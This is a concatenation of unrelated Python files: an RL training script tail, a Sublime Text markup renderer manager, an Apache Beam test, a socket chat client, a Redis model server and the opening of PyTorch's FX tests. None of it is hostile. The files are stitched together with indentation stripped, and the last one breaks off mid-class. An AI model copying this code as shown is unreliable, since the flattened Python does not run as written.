ob_no = np.concatenate([path["observation"] for path in paths])
ac_na = np.concatenate([path["action"] for path in paths])
re_n = [path["reward"] for path in paths]
q_n, adv_n = agent.estimate_return(ob_no, re_n)
agent.update_parameters(ob_no, ac_na, q_n, adv_n)
# Log diagnostics
returns = [path["reward"].sum() for path in paths]
ep_lengths = [pathlength(path) for path in paths]
logz.log_tabular("Time", time.time() - start)
logz.log_tabular("Iteration", itr)
logz.log_tabular("AverageReturn", np.mean(returns))
logz.log_tabular("StdReturn", np.std(returns))
logz.log_tabular("MaxReturn", np.max(returns))
logz.log_tabular("MinReturn", np.min(returns))
logz.log_tabular("EpLenMean", np.mean(ep_lengths))
logz.log_tabular("EpLenStd", np.std(ep_lengths))
logz.log_tabular("TimestepsThisBatch", timesteps_this_batch)
logz.log_tabular("TimestepsSoFar", total_timesteps)
logz.dump_tabular()
logz.pickle_tf_vars()
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('env_name', type=str)
parser.add_argument('--exp_name', type=str, default='vpg')
parser.add_argument('--render', action='store_true')
parser.add_argument('--discount', type=float, default=1.0)
parser.add_argument('--n_iter', '-n', type=int, default=100)
parser.add_argument('--batch_size', '-b', type=int, default=1000)
parser.add_argument('--ep_len', '-ep', type=float, default=-1.)
parser.add_argument('--learning_rate', '-lr', type=float, default=5e-3)
parser.add_argument('--reward_to_go', '-rtg', action='store_true')
parser.add_argument('--dont_normalize_advantages', '-dna', action='store_true')
parser.add_argument('--nn_baseline', '-bl', action='store_true')
parser.add_argument('--seed', type=int, default=2)
parser.add_argument('--n_experiments', '-e', type=int, default=1)
parser.add_argument('--n_layers', '-l', type=int, default=1)
parser.add_argument('--size', '-s', type=int, default=32)
args = parser.parse_args()
if not(os.path.exists('data')):
os.makedirs('data')
logdir = args.exp_name + '_' + args.env_name + '_' + time.strftime("%d-%m-%Y_%H-%M-%S")
logdir = os.path.join('data', logdir)
if not(os.path.exists(logdir)):
os.makedirs(logdir)
max_path_length = args.ep_len if args.ep_len > 0 else None
processes = []
for e in range(args.n_experiments):
seed = args.seed + 10*e
print('Running experiment with seed %d'%seed)
def train_func():
train_PG(
exp_name=args.exp_name,
env_name=args.env_name,
n_iter=args.n_iter,
gamma=args.discount,
min_timesteps_per_batch=args.batch_size,
max_path_length=max_path_length,
learning_rate=args.learning_rate,
reward_to_go=args.reward_to_go,
animate=args.render,
logdir=os.path.join(logdir,'%d'%seed),
normalize_advantages=not(args.dont_normalize_advantages),
nn_baseline=args.nn_baseline,
seed=seed,
n_layers=args.n_layers,
size=args.size
)
# # Awkward hacky process runs, because Tensorflow does not like
# # repeatedly calling train_PG in the same thread.
train_func()
#p = Process(target=train_func, args=tuple())
#p.start()
#processes.append(p)
# if you comment in the line below, then the loop will block
# until this process finishes
#p.join()
#for p in processes:
#p.join()
if __name__ == "__main__":
main()
|
RendererManager.py
|
"""
Copyright (c) 2013 Timon Wong
Permission is hereby granted, free of charge, to any person obtaining a copy of
this software and associated documentation files (the "Software"), to deal in
the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
of the Software, and to permit persons to whom the Software is furnished to do
so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import sublime
import base64
import imp
import inspect
import mimetypes
import os
import re
import sys
import tempfile
import threading
from time import time
from . import log, LibraryPathManager
from .Setting import Setting
from .Common import entities_unescape, Singleton, RWLock, Future, PY3K
# HACK: Make sure required Renderers package load first
exec('from .Renderers import base_renderer')
if PY3K:
from urllib.request import url2pathname
from urllib.parse import urlparse
getcwd = os.getcwd
else:
from urllib import url2pathname
from urlparse import urlparse
getcwd = os.getcwdu
__file__ = os.path.normpath(os.path.abspath(__file__))
__path__ = os.path.dirname(__file__)
LibraryPathManager.add_search_path(os.path.dirname(sys.executable))
LibraryPathManager.add_search_path(os.path.join(__path__, 'libs'))
LibraryPathManager.add_search_path(os.path.join(__path__, 'Renderers', 'libs'))
if PY3K:
LibraryPathManager.add_search_path(os.path.join(__path__, 'Renderers', 'libs', 'python3'))
else:
LibraryPathManager.add_search_path(os.path.join(__path__, 'Renderers', 'libs', 'python2'))
from bottle import template
# Test filesystem case sensitivity
# http://stackoverflow.com/questions/7870041/check-if-file-system-is-case-insensitive-in-python
g_fs_case_sensitive = True
def check_filesystem_case_sensitivity():
global g_fs_case_sensitive
fd, path = tempfile.mkstemp()
if os.path.exists(path.upper()):
g_fs_case_sensitive = False
else:
g_fs_case_sensitive = True
os.close(fd)
os.remove(path)
check_filesystem_case_sensitivity()
def filesystem_path_equals(path1, path2):
if g_fs_case_sensitive:
return path1 == path2
else:
return path1.lower() == path2.lower()
PathCreateFromUrlW = None
if sys.platform == 'win32':
import ctypes
def run():
global PathCreateFromUrlW
shlwapi = ctypes.windll.LoadLibrary('Shlwapi.dll')
PathCreateFromUrlW = shlwapi.PathCreateFromUrlW
PathCreateFromUrlW.restype = ctypes.HRESULT
PathCreateFromUrlW.argtypes = [
ctypes.c_wchar_p,
ctypes.c_wchar_p,
ctypes.POINTER(ctypes.c_uint32),
ctypes.c_uint32,
]
run()
def file_uri_to_path(uri):
if PathCreateFromUrlW is not None:
path_len = ctypes.c_uint32(260)
path = ctypes.create_unicode_buffer(path_len.value)
PathCreateFromUrlW(uri, path, ctypes.byref(path_len), 0)
return path.value
else:
return url2pathname(urlparse(uri).path)
class RenderedMarkupCacheEntry(dict):
__getattr__ = dict.__getitem__
__setattr__ = dict.__setitem__
__delattr__ = dict.__delitem__
def __init__(self, fullpath, html_part=''):
self.disconnected = False
revivable_key = base64.b64encode(fullpath.encode('utf-8')).decode('ascii')
filename = os.path.basename(fullpath)
dirname = os.path.dirname(fullpath)
self['revivable_key'] = revivable_key
self['filename'] = filename
self['dirname'] = dirname
self['timestamp'] = str(time())
self['html_part'] = html_part
self['__deepcopy__'] = self.__deepcopy__
def __deepcopy__(self, memo={}):
return self.copy()
@Singleton
class RenderedMarkupCache(object):
def __init__(self):
self.rwlock = RWLock()
self.cache = {}
def exists(self, buffer_id):
with self.rwlock.readlock:
return buffer_id in self.cache
def get_entry(self, buffer_id):
with self.rwlock.readlock:
if buffer_id in self.cache:
return self.cache[buffer_id]
return None
def set_entry(self, buffer_id, entry):
with self.rwlock.writelock:
self.cache[buffer_id] = entry
def clean(self):
with self.rwlock.writelock:
self.cache.clear()
class WorkerQueueItem(object):
def __init__(self, buffer_id, timestamp=0, fullpath='untitled', lang='', text=''):
self.buffer_id = buffer_id
self.timestamp = timestamp
self.fullpath = fullpath or 'untitled'
self.lang = lang
self.text = text
def __cmp__(self, other):
return self.buffer_id == other.buffer_id
def __hash__(self):
return hash(self.buffer_id)
class RendererWorker(threading.Thread):
def __init__(self, mutex):
threading.Thread.__init__(self)
self.cond = threading.Condition(mutex)
self.que = set()
self.stopping = False
def enqueue(self, buffer_id, fullpath, lang, text, immediate=False):
item = WorkerQueueItem(buffer_id, fullpath=fullpath, lang=lang, text=text)
if immediate: # Render in the main thread
self._run_queued_item(item)
else:
with self.cond:
self.que.add(item)
self.cond.notify()
def _run_queued_item(self, item):
try:
# Render text and save to cache
html_part = RendererManager.render_text(item.fullpath, item.lang, item.text)
entry = RenderedMarkupCacheEntry(item.fullpath, html_part=html_part)
RenderedMarkupCache.instance().set_entry(item.buffer_id, entry)
except NotImplementedError:
pass
except Exception as err:
log.exception(err)
def run(self):
while True:
with self.cond:
self.cond.wait()
if self.stopping:
break
if len(self.que) == 0:
continue
for item in list(self.que):
self._run_queued_item(item)
self.que.clear()
def stop(self):
self.stopping = True
with self.cond:
self.cond.notify()
self.join()
class RendererManager(object):
MUTEX = threading.Lock()
WORKER = RendererWorker(MUTEX)
LANG_RE = re.compile(r'^[^\s]+(?=\s+)')
RENDERERS = []
@classmethod
def any_available_renderer(cls, filename, lang):
# filename may be None, so prevent it
filename = filename or ""
for renderer_classname, renderer in cls.RENDERERS:
if renderer.is_enabled(filename, lang):
return True
return False
@classmethod
def any_available_renderer_for_view(cls, view):
filename = view.file_name()
lang = cls.get_lang_by_scope_name(view.scope_name(0))
return cls.any_available_renderer(filename, lang)
@classmethod
def get_lang_by_scope_name(cls, scope_name):
m = cls.LANG_RE.search(scope_name)
if m is None:
lang = ""
else:
lang = m.group(0).lower()
return lang
@classmethod
def render_text(cls, fullpath, lang, text, post_process_func=None):
"""Render text (markups) as HTML"""
if post_process_func is None:
post_process_func = cls.render_text_postprocess
filename = os.path.basename(fullpath)
for renderer_classname, renderer in cls.RENDERERS:
try:
if renderer.is_enabled(filename, lang):
rendered_text = renderer.render(text, filename=filename)
return post_process_func(rendered_text, fullpath)
except:
log.exception('Exception occured while rendering using %s', renderer_classname)
raise NotImplementedError()
IMG_TAG_RE = re.compile(r'(<img [^>]*src=")([^"]+)("[^>]*>)', re.DOTALL | re.IGNORECASE | re.MULTILINE)
@classmethod
def render_text_postprocess(cls, rendered_text, filename):
dirname = os.path.dirname(filename)
def encode_image_path(m):
url = m.group(2)
o = urlparse(url)
if (len(o.scheme) > 0 and o.scheme != 'file') or url.startswith('//'):
# Is a valid url, returns original text
return m.group(0)
# or local file (maybe?)
if o.scheme == 'file':
local_path = file_uri_to_path(url)
else:
local_path = os.path.normpath(os.path.join(dirname, entities_unescape(url)))
encoded_path = base64.urlsafe_b64encode(local_path.encode('utf-8')).decode('ascii')
return m.group(1) + '/local/' + encoded_path + m.group(3)
return cls.IMG_TAG_RE.sub(encode_image_path, rendered_text)
@classmethod
def render_text_postprocess_exporting(cls, rendered_text, filename):
# Embedding images
dirname = os.path.dirname(filename)
def encode_image_path(m):
url = m.group(2)
o = urlparse(url)
if (len(o.scheme) > 0 and o.scheme != 'file') or url.startswith('//'):
# Is a valid url, returns original text
return m.group(0)
# or local file (maybe?)
if o.scheme == 'file':
local_path = file_uri_to_path(url)
else:
local_path = os.path.normpath(os.path.join(dirname, entities_unescape(url)))
mime_type, _ = mimetypes.guess_type(os.path.basename(local_path))
if mime_type is not None:
data_uri = base64.b64encode(open(local_path, 'rb').read())
image_tag_src = 'data:%s;base64,%s' % (mime_type, data_uri.decode('ascii'))
else:
image_tag_src = '[Invalid mime type]'
return m.group(1) + image_tag_src + m.group(3)
return cls.IMG_TAG_RE.sub(encode_image_path, rendered_text)
@classmethod
def render_view_as_html(cls, view):
fullpath = view.file_name() or ''
lang = RendererManager.get_lang_by_scope_name(view.scope_name(0))
text = view.substr(sublime.Region(0, view.size()))
html_part = RendererManager.render_text(
fullpath, lang, text,
post_process_func=cls.render_text_postprocess_exporting)
setting = Setting.instance()
return template(setting.export_options['template_name'],
mathjax_enabled=setting.mathjax_enabled,
filename=os.path.basename(fullpath),
dirname=os.path.dirname(fullpath),
html_part=html_part)
@classmethod
def enqueue_view(cls, view, only_exists=False, immediate=False):
buffer_id = view.buffer_id()
if only_exists and not RenderedMarkupCache.instance().exists(buffer_id):
return
region = sublime.Region(0, view.size())
text = view.substr(region)
lang = cls.get_lang_by_scope_name(view.scope_name(0))
cls.WORKER.enqueue(buffer_id, view.file_name(), lang, text, immediate=immediate)
@classmethod
def enqueue_buffer_id(cls, buffer_id, only_exists=False, immediate=False):
"""Render by view id immediately and return result as HTML"""
def query_valid_view(buffer_id):
"""Query a valid view by buffer id"""
for window in sublime.windows():
for view in window.views():
if view.buffer_id() == buffer_id:
return view
return None
valid_view = query_valid_view(buffer_id)
if valid_view is not None:
RendererManager.enqueue_view(valid_view, only_exists=only_exists, immediate=immediate)
return RenderedMarkupCache.instance().get_entry(buffer_id)
@classmethod
def revive_buffer(cls, revivable_key):
# Wait until all renderers finished initializing
if not cls.STARTED:
return None
revivable_key = base64.b64decode(revivable_key).decode('utf-8')
for window in sublime.windows():
for view in window.views():
file_name = view.file_name()
# NOTE: Since file_name is None for console view, so we just
# ignore it
if file_name is None:
continue
if filesystem_path_equals(file_name, revivable_key):
return view.buffer_id()
return None
@classmethod
def _import_module(cls, name, path, prefix=None):
if prefix and isinstance(prefix, str):
modname = "%s.%s" % (prefix, name)
else:
modname = name
f, filename, etc = imp.find_module(name, [path])
mod = imp.load_module(modname, f, filename, etc)
return mod
@classmethod
def _load_renderer(cls, renderers, path, name):
prefix = 'OmniMarkupLib.Renderers'
if PY3K:
prefix = 'OmniMarkupPreviewer.' + prefix
try:
mod = cls._import_module(name, path, prefix)
# Get classes
classes = inspect.getmembers(mod, inspect.isclass)
for classname, classtype in classes:
# Register renderer into manager
if hasattr(classtype, 'IS_VALID_RENDERER__'):
try:
log.info('Loaded renderer: %s', classname)
# Add both classname and its instance
renderers.append((classname, classtype()))
except:
log.exception('Failed to load renderer: %s', classname)
except:
log.exception('Failed to load renderer module: %s.%s', prefix, name)
@classmethod
def load_renderers(cls, excludes):
renderers = []
with cls.MUTEX:
# Change the current directory to that of the module. It's not safe to just
# add the modules directory to sys.path, as that won't accept unicode paths
# on Windows
renderers_path = os.path.join(__path__, 'Renderers/')
oldpath = getcwd()
os.chdir(os.path.join(__path__, '..'))
try:
module_list = [f for f in os.listdir(renderers_path)
if f.endswith('Renderer.py')]
# Load each renderer
for module_file in module_list:
name = module_file[:-3]
if name in excludes:
continue
cls._load_renderer(renderers, renderers_path, name)
finally:
# Restore the current directory
os.chdir(oldpath)
cls.RENDERERS = renderers
OLD_IGNORED_RENDERERS = set()
@classmethod
def on_setting_changing(cls, setting):
cls.OLD_IGNORED_RENDERERS = setting.ignored_renderers.copy()
@classmethod
def on_setting_changed(cls, setting):
# Unload ignored renderers
if cls.OLD_IGNORED_RENDERERS != setting.ignored_renderers:
# Reload renderers, of course
cls.load_renderers(setting.ignored_renderers)
for renderer_classname, renderer in cls.RENDERERS:
key = 'renderer_options-' + renderer_classname
try:
renderer_options = setting.get_setting(key, {})
renderer.load_settings(renderer_options, setting)
except:
log.exception('Error on setting renderer options for %s', renderer_classname)
WAIT_TIMEOUT = 1.0
STARTED = True
RENDERERS_LOADER_THREAD = None
@classmethod
def ensure_started(cls):
if cls.RENDERERS_LOADER_THREAD is not None:
try:
cls.RENDERERS_LOADER_THREAD.join(cls.WAIT_TIMEOUT)
except:
pass
return cls.STARTED
@classmethod
def start(cls):
cls.STARTED = False
setting = Setting.instance()
setting.subscribe('changing', cls.on_setting_changing)
setting.subscribe('changed', cls.on_setting_changed)
cls.WORKER.start()
cls.on_setting_changing(setting)
def _start():
cls.load_renderers(setting.ignored_renderers)
f = Future(lambda: cls.on_setting_changed(setting))
sublime.set_timeout(f, 0)
f.result()
cls.RENDERERS_LOADER_THREAD = None
cls.STARTED = True
cls.RENDERERS_LOADER_THREAD = threading.Thread(target=_start)
# Postpone renderer loader thread, otherwise break loading of other plugins.
sublime.set_timeout(lambda: cls.RENDERERS_LOADER_THREAD.start(), 0)
@classmethod
def stop(cls):
cls.STARTED = False
cls.WORKER.stop()
if cls.RENDERERS_LOADER_THREAD is not None:
try:
cls.RENDERERS_LOADER_THREAD.join()
except:
pass
|
shared_test.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Test for Shared class."""
import gc
import threading
import time
import unittest
from apache_beam.utils import shared
class Count(object):
def __init__(self):
self._lock = threading.Lock()
self._total = 0
self._active = 0
def add_ref(self):
with self._lock:
self._total += 1
self._active += 1
def release_ref(self):
with self._lock:
self._active -= 1
def get_active(self):
with self._lock:
return self._active
def get_total(self):
with self._lock:
return self._total
class Marker(object):
def __init__(self, count):
self._count = count
self._count.add_ref()
def __del__(self):
self._count.release_ref()
class NamedObject(object):
def __init__(self, name):
self._name = name
def get_name(self):
return self._name
class Sequence(object):
def __init__(self):
self._sequence = 0
def make_acquire_fn(self):
# Every time acquire_fn is called, increases the sequence number and returns
# a NamedObject with that sequenece number.
def acquire_fn():
self._sequence += 1
return NamedObject('sequence%d' % self._sequence)
return acquire_fn
class SharedTest(unittest.TestCase):
def testKeepalive(self):
count = Count()
shared_handle = shared.Shared()
other_shared_handle = shared.Shared()
def dummy_acquire_fn():
return None
def acquire_fn():
return Marker(count)
p1 = shared_handle.acquire(acquire_fn)
self.assertEqual(1, count.get_total())
self.assertEqual(1, count.get_active())
del p1
gc.collect()
# Won't be garbage collected, because of the keep-alive
self.assertEqual(1, count.get_active())
# Reacquire.
p2 = shared_handle.acquire(acquire_fn)
self.assertEqual(1, count.get_total()) # No reinitialisation.
self.assertEqual(1, count.get_active())
# Get rid of the keepalive
other_shared_handle.acquire(dummy_acquire_fn)
del p2
gc.collect()
self.assertEqual(0, count.get_active())
def testMultiple(self):
count = Count()
shared_handle = shared.Shared()
other_shared_handle = shared.Shared()
def dummy_acquire_fn():
return None
def acquire_fn():
return Marker(count)
p = shared_handle.acquire(acquire_fn)
other_shared_handle.acquire(dummy_acquire_fn) # Get rid of the keepalive
self.assertEqual(1, count.get_total())
self.assertEqual(1, count.get_active())
del p
gc.collect()
self.assertEqual(0, count.get_active())
# Shared value should be garbage collected.
# Acquiring multiple times only results in one initialisation
p1 = shared_handle.acquire(acquire_fn)
# Since shared value was released, expect a reinitialisation.
self.assertEqual(2, count.get_total())
self.assertEqual(1, count.get_active())
p2 = shared_handle.acquire(acquire_fn)
self.assertEqual(2, count.get_total())
self.assertEqual(1, count.get_active())
other_shared_handle.acquire(dummy_acquire_fn) # Get rid of the keepalive
# Check that shared object isn't destroyed if there's still a reference to
# it.
del p2
gc.collect()
self.assertEqual(1, count.get_active())
del p1
gc.collect()
self.assertEqual(0, count.get_active())
def testConcurrentCallsDeduped(self):
# Test that only one among many calls to acquire will actually run the
# initialisation function.
count = Count()
shared_handle = shared.Shared()
other_shared_handle = shared.Shared()
refs = []
ref_lock = threading.Lock()
def dummy_acquire_fn():
return None
def acquire_fn():
time.sleep(1)
return Marker(count)
def thread_fn():
p = shared_handle.acquire(acquire_fn)
with ref_lock:
refs.append(p)
threads = []
for _ in range(100):
t = threading.Thread(target=thread_fn)
threads.append(t)
t.start()
for t in threads:
t.join()
self.assertEqual(1, count.get_total())
self.assertEqual(1, count.get_active())
other_shared_handle.acquire(dummy_acquire_fn) # Get rid of the keepalive
with ref_lock:
del refs[:]
gc.collect()
self.assertEqual(0, count.get_active())
def testDifferentObjects(self):
sequence = Sequence()
def dummy_acquire_fn():
return None
first_handle = shared.Shared()
second_handle = shared.Shared()
dummy_handle = shared.Shared()
f1 = first_handle.acquire(sequence.make_acquire_fn())
s1 = second_handle.acquire(sequence.make_acquire_fn())
self.assertEqual('sequence1', f1.get_name())
self.assertEqual('sequence2', s1.get_name())
f2 = first_handle.acquire(sequence.make_acquire_fn())
s2 = second_handle.acquire(sequence.make_acquire_fn())
# Check that the repeated acquisitions return the earlier objects
self.assertEqual('sequence1', f2.get_name())
self.assertEqual('sequence2', s2.get_name())
# Release all references and force garbage-collection
del f1
del f2
del s1
del s2
dummy_handle.acquire(dummy_acquire_fn) # Get rid of the keepalive
gc.collect()
# Check that acquiring again after they're released gives new objects
f3 = first_handle.acquire(sequence.make_acquire_fn())
s3 = second_handle.acquire(sequence.make_acquire_fn())
self.assertEqual('sequence3', f3.get_name())
self.assertEqual('sequence4', s3.get_name())
def testTagCacheEviction(self):
shared1 = shared.Shared()
shared2 = shared.Shared()
def acquire_fn_1():
return NamedObject('obj_1')
def acquire_fn_2():
return NamedObject('obj_2')
# with no tag, shared handle does not know when to evict objects
p1 = shared1.acquire(acquire_fn_1)
assert p1.get_name() == 'obj_1'
p2 = shared1.acquire(acquire_fn_2)
assert p2.get_name() == 'obj_1'
# cache eviction can be forced by specifying different tags
p1 = shared2.acquire(acquire_fn_1, tag='1')
assert p1.get_name() == 'obj_1'
p2 = shared2.acquire(acquire_fn_2, tag='2')
assert p2.get_name() == 'obj_2'
def testTagReturnsCached(self):
sequence = Sequence()
handle = shared.Shared()
f1 = handle.acquire(sequence.make_acquire_fn(), tag='1')
self.assertEqual('sequence1', f1.get_name())
# should return cached
f1 = handle.acquire(sequence.make_acquire_fn(), tag='1')
self.assertEqual('sequence1', f1.get_name())
if __name__ == '__main__':
unittest.main()
|
Client.py
|
import socket
import threading
class Client:
def __init__(self):
self.create_connection()
def create_connection(self):
self.s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
while 1:
try:
host = input('Enter host name --> ')
port = int(input('Enter port --> '))
self.s.connect((host,port))
break
except:
print("Couldn't connect to server")
self.username = input('Enter username --> ')
self.s.send(self.username.encode())
message_handler = threading.Thread(target=self.handle_messages,args=())
message_handler.start()
input_handler = threading.Thread(target=self.input_handler,args=())
input_handler.start()
def handle_messages(self):
while 1:
print(self.s.recv(1204).decode())
def input_handler(self):
while 1:
self.s.send((self.username+' - '+input()).encode())
client = Client()
|
model_server.py
|
"""Scooter ML model server."""
import json
import time
from threading import Thread
import signal
from select import select
import sys
import numpy as np
import redis
# initialize constants used for server queuing
PREDICTION_QUEUE = "prediction:queue"
BATCH_SIZE = 32
SERVER_SLEEP = 0.25
CLIENT_SLEEP = 0.25
TIMEOUT = 5
ctrl_c_pressed = 0
db = redis.StrictRedis(host="localhost", port=6379, db=0)
def predictions_process(model_loader, sample_decoder, prediction_decoder):
"""Continuously query queue for new prediction jobs and execute them."""
model = model_loader()
# continually pool for new data to classify
while True:
batch_elements = db.lrange(PREDICTION_QUEUE, 0, BATCH_SIZE - 1)
batch, x_ids = _build_batch(batch_elements, sample_decoder)
if not x_ids:
time.sleep(SERVER_SLEEP)
continue
# classify the batch
print("Predicting on batch of size: %s" % (batch.shape,))
preds = model.predict(batch)
results = prediction_decoder(preds)
# loop over the x IDs and their corresponding set of results from our model
for (x_id, result_set) in zip(x_ids, results):
# initialize the list of output predictions
output = []
# loop over the results and add them to the list of output predictions
for (_, label, prob) in result_set:
result = {"label": label, "probability": float(prob)}
output.append(result)
# store the predictions in the database, using the ID as the key so we can fetch the results
db.set(x_id, json.dumps(output))
# remove the set of images from our queue
db.ltrim(PREDICTION_QUEUE, len(x_ids), -1)
time.sleep(SERVER_SLEEP)
def _build_batch(batch_elements, sample_decoder):
# attempt to grab a batch of images from the database, then initialize the image IDs and batch of images themselves
x_ids = []
batch = None
# loop over the queue
for element in batch_elements:
# deserialize the object and obtain the input image
element = json.loads(element.decode("utf-8"))
image = sample_decoder(element["x"])
if batch is None:
batch = image
# otherwise, stack the data
else:
batch = np.vstack([batch, image])
# update the list of image IDs
x_ids.append(element["id"])
return batch, x_ids
def _signal_handler(sig, frame):
global ctrl_c_pressed
if ctrl_c_pressed:
print("")
print("Shutting down.")
sys.exit(0)
ctrl_c_pressed = True
print("\rShut down this prediction service (y/[n])? ", end="")
rlist, _, _ = select([sys.stdin], [], [], TIMEOUT)
if rlist:
s = sys.stdin.readline()
if s.strip() == "y":
print("Shutting down.")
sys.exit(0)
print("Resuming.")
else:
print("No answer. Resuming.")
ctrl_c_pressed = False
def start_model_server(load_model, decode_sample, decode_predictions):
print("Starting prediction service")
signal.signal(signal.SIGINT, _signal_handler)
thread = Thread(target=predictions_process, args=(load_model, decode_sample, decode_predictions))
thread.daemon = True
thread.start()
while True:
time.sleep(1)
|
test_fx.py
|
import builtins
import contextlib
import copy
import functools
import inspect
import math
import numbers
import operator
import os
import pickle
import sys
import torch
import traceback
import typing
import types
import warnings
import unittest
from math import sqrt
from torch.multiprocessing import Process
from torch.testing import FileCheck
from torch.testing._internal.common_methods_invocations import op_db
from torch.testing._internal.common_device_type import ops, onlyCPU, instantiate_device_type_tests
import torch.utils._pytree as pytree
import torch.fx._pytree as fx_pytree
from torch.fx import symbolic_trace, Proxy, Node, GraphModule, Interpreter, Tracer, Transformer, Graph, wrap, PH
import torch._C._fx
from torch.fx.node import Target, Argument
from torch.fx.passes import shape_prop
from torch.fx.immutable_collections import immutable_dict, immutable_list
from torch.fx.experimental.rewriter import RewritingTracer
from torch.fx.operator_schemas import get_signature_for_torch_op
from copy import deepcopy
from collections import namedtuple
from torch.fx.proxy import TraceError
from torch.fx._compatibility import _BACK_COMPAT_OBJECTS, _MARKED_WITH_COMATIBLITY
from fx.test_subgraph_rewriter import TestSubgraphRewriter # noqa: F401
from fx.test_dce_pass import TestDCE # noqa: F401
from fx.test_fx_const_fold import TestConstFold # noqa: F401
from fx.test_fx_param_shape_control_flow import TestConstParamShapeInControlFlow # noqa: F401
if sys.version_info >= (3, 7):
from fx.test_gradual_type import AnnotationsTest # noqa: F401
if sys.version_info >= (3, 7):
from fx.test_gradual_type import TypeCheckerTest # noqa: F401
from typing import Any, Callable, Dict, NamedTuple, List, Optional, Tuple, Union
from torch.testing._internal.common_utils import (
IS_FBCODE,
IS_MACOS,
IS_WINDOWS,
TEST_WITH_ROCM,
find_library_location,
run_tests,
)
from torch.testing._internal.jit_utils import JitTestCase
from fx.named_tup import MyNamedTup
try:
from torchvision import models as torchvision_models
HAS_TORCHVISION = True
except ImportError:
HAS_TORCHVISION = False
skipIfNoTorchVision = unittest.skipIf(not HAS_TORCHVISION, "no torchvision")
class SimpleTest(torch.nn.Module):
def forward(self, x):
return torch.relu(x + 3.0)
def a_non_torch_leaf(a, b):
return a + b
# Used for test_autowrap_function. Autowrapped functions need to be global
def fx_int(x: float) -> int:
return int(x)
def fx_int_x2(x: float) -> int:
return int(x) * 2
# used in test_pytree. It's all the way out here because pickling a GraphModule
# that uses Point errors out if Point is local to the function
Point = namedtuple('Point', ['x', 'y'])
# Test wrap() passing both a function name as well as a function
# directly
def a_lifted_leaf(a, b):
return a[0] + a[1] + b
wrap('a_lifted_leaf')
# Test wrapping twice doesn't break anything
wrap('a_lifted_leaf')
def a_lifted_leaf2(a, b):
return a[0] + a[1] + b
wrap(a_lifted_leaf2)
wrap('len')
wrap('getattr')
@wrap
def wrapped_via_decorator(a):
return a + 1
wrap('wrapped_with_submodule')
def wrapped_with_submodule(x: torch.Tensor, batchnorm1d: torch.nn.BatchNorm1d):
return batchnorm1d(x)
real_wrapped_via_decorator = wrapped_via_decorator
real_a_lifed_leaf = a_lifted_leaf
real_a_lifed_leaf2 = a_lifted_leaf2
_sqrt = sqrt
wrap('wrapper_fn')
def wrapper_fn(x):
return torch.foo(x)
class Pair(NamedTuple):
x : torch.Tensor
y : torch.Tensor
# for testing pytrees
class Foo(object): # noqa: B209
def __init__(self, a, b):
self.a = a
self.b = b
class TestFX(JitTestCase):
def setUp(self):
# Checking for mutable operations whil tracing is feature flagged
# Enable it in testing but not by default
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
if not (TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS):
lib_file_path = find_library_location('libtorchbind_test.so')
torch.ops.load_library(str(lib_file_path))
def tearDown(self):
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
def checkGraphModule(self, m: torch.nn.Module, args, kwargs=None):
"""Check that an nn.Module's results match the GraphModule version
for a given set of args/kwargs.
"""
kwargs = kwargs if kwargs else {}
ref_outs = m(*args, **kwargs)
gm = symbolic_trace(m)
gm.graph.lint()
test_outs = gm(*args, **kwargs)
self.assertEqual(ref_outs, test_outs)
def test_graph_module(self):
class MySub(torch.nn.Module):
def __init__(self):
super().__init__()
self.w = torch.nn.Parameter(torch.rand(4, 3))
def forward(self, x):
return self.w + x
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.lin = torch.nn.Linear(4, 3)
self.sub_mod = MySub()
self.w = torch.nn.Parameter(torch.rand(3))
def forward(self, A, B, c):
t = torch.sigmoid(A) + self.lin(c)
return self.sub_mod(t.data + self.w + t + 1 - A + B // A + -A + A.add(B, alpha=3))
m = MyModule()
gm = symbolic_trace(m)
ms = torch.jit.script(gm)
class M2(torch.nn.Module):
def forward(self, A):
m, idx = torch.max(A, 0)
return m + 1, idx + 1
m2 = M2()
gm2 = symbolic_trace(m2)
class T(torch.nn.Module):
def forward(self, A, b=4, *args, c=5, **kwargs):
x = A + 1 + args[0] + kwargs['3']
return x
t = T()
symbolic_trace(t)
# test for issue described at https://github.com/pytorch/pytorch/issues/63883
class M3(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
m3 = M3()
gm3 = symbolic_trace(m3)
new_instance = gm3.__new__(type(gm3))
new_instance.__init__(gm3, gm3.graph)
x = torch.randn(5, 3)
torch.testing.assert_allclose(new_instance(x), torch.relu(x))
def test_custom_import(self):
graph = torch.fx.Graph()
a = graph.placeholder('x')
b = graph.placeholder('y')
c = graph.call_function(a_non_torch_leaf, (a, b))
d = graph.call_function(torch.sin, (c,))
graph.output(d)
gm = GraphModule(torch.nn.Module(), graph)
x, y = torch.rand(1), torch.rand(1)
self.assertEqual(torch.sin(x + y), gm(x, y))
def test_args_kwargs(self):
class T(torch.nn.Module):
